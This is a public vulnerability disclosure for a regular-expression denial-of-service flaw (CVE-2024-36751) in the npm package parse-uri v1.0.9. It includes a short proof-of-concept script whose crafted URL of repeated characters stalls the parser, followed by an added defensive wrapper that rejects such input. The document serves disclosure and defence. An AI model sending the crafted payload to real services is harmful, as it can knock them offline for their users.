@6en6ar
Created January 15, 2025 12:21
Public disclosure of a security issue in the parse-uri library
Product: https://www.npmjs.com/package/parse-uri
Version: v1.0.9
Vulnerability type: Denial of Service
CVE ID: CVE-2024-36751
Description: A denial of service is possible when a URL containing repeated characters is parsed.
It seems that the regex used to check the URL on lines 28 and 29 of index.js is vulnerable to regular expression denial of service (ReDoS).
GitHub issue: https://github.com/Kikobeats/parse-uri/issues/14
PoC:
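const parseUri = require('parse-uri')
// Time a single parse of the crafted URL
console.time('[ + ] Time passed -> ');
// Long runs of repeated characters after the scheme
const payload = 'https://0' + '@/@.44'.repeat(45502) + '\x00.'.repeat(45502)
parseUri(payload)
// Baseline for comparison: a normal URL
//parseUri('https://google.com')
console.timeEnd('[ + ] Time passed -> ');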
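
Mitigation sketch for untrusted URL input, as an added example that is not part of the original disclosure or of parse-uri: it caps input length, rejects control characters, and parses with the platform's built-in WHATWG URL class instead of a regex. The 2048-character cap, the function name safeParseUrl and the returned field names are assumptions chosen for this example.

```javascript
// Added example: defensive wrapper for untrusted URL strings.
// Not parse-uri code. MAX_URL_LENGTH and the result field names are
// assumptions made for this example.
const MAX_URL_LENGTH = 2048;

// Control characters (the PoC pads its input with \x00) are rejected.
// Single character class, no quantifier: one linear scan, no backtracking.
const CONTROL_CHARS = /[\u0000-\u001f\u007f]/;

function safeParseUrl(input, maxLength = MAX_URL_LENGTH) {
  if (typeof input !== 'string') {
    return { ok: false, reason: 'not-a-string' };
  }
  // Constant-time check first: it bounds the work of every later step.
  if (input.length > maxLength) {
    return { ok: false, reason: 'too-long' };
  }
  if (CONTROL_CHARS.test(input)) {
    return { ok: false, reason: 'control-character' };
  }
  let url;
  try {
    // WHATWG URL parser shipped with Node.js and browsers; the spec
    // defines it as a state machine rather than a backtracking regex.
    url = new URL(input);
  } catch {
    return { ok: false, reason: 'invalid-url' };
  }
  return {
    ok: true,
    protocol: url.protocol.replace(/:$/, ''),
    host: url.hostname,
    port: url.port,
    path: url.pathname,
    query: url.search.slice(1),
    anchor: url.hash.slice(1),
  };
}

// Constructed sample inputs. The oversized one has the same shape as the PoC.
const samples = [
  'https://user@example.com:8443/a/b?x=1#top',
  'https://0' + '@/@.44'.repeat(45502) + '\x00.'.repeat(45502),
  'https://example.com/\x00.',
  'not a url',
];
for (const s of samples) {
  console.log(s.slice(0, 40), '->', JSON.stringify(safeParseUrl(s)));
}
```

The length check runs before anything else, so the oversized input is rejected without being scanned or parsed.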